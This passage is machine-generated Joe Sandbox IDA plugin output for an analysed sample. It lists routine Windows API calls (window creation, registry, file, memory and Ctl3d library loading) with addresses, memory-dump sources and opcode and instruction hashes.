                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 1306739567-0
                                                                                                    • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                    • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                                    • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                    • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                                    APIs
                                                                                                    • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExtentPointText
                                                                                                    • String ID:
                                                                                                    • API String ID: 566491939-0
                                                                                                    • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                    • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                                    • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                    • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                    • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                                    • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                    • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                                    APIs
                                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                    • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                                    • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                    • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                                    APIs
                                                                                                    • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                    • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                                    • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                    • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                    • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                    • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                    • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                    • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                                    • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                    • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                                    APIs
                                                                                                      • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                    • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                      • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem$ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3202724764-0
                                                                                                    • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                    • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                                    • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                    • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                                    APIs
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                    Similarity
                                                                                                    • API ID: TextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 530164218-0
                                                                                                    • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                    • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                                    • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                    • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                    • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                    • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                    • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                    • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                                    • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                    • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                    • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                    • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                    • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                      • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 734332943-0
                                                                                                    • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                    • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                                    • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                    • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID:
                                                                                                    • API String ID: 1611563598-0
                                                                                                    • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                    • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                    • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                    • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                    • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                    • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                    • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DestroyWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3375834691-0
                                                                                                    • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                    • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                    • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                    • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                    • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                    • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                    • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                    • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                    • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                    • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1452528299-0
                                                                                                    • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                    • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                                    • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                    • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                    • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                    • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                    • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                    • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                    • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                    • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                    • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                    • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                    • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                    • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                    • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                    • API String ID: 2323315520-3614243559
                                                                                                    • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                    • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                                    • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                    • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 0045862F
                                                                                                    • QueryPerformanceCounter.KERNEL32(02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 00458638
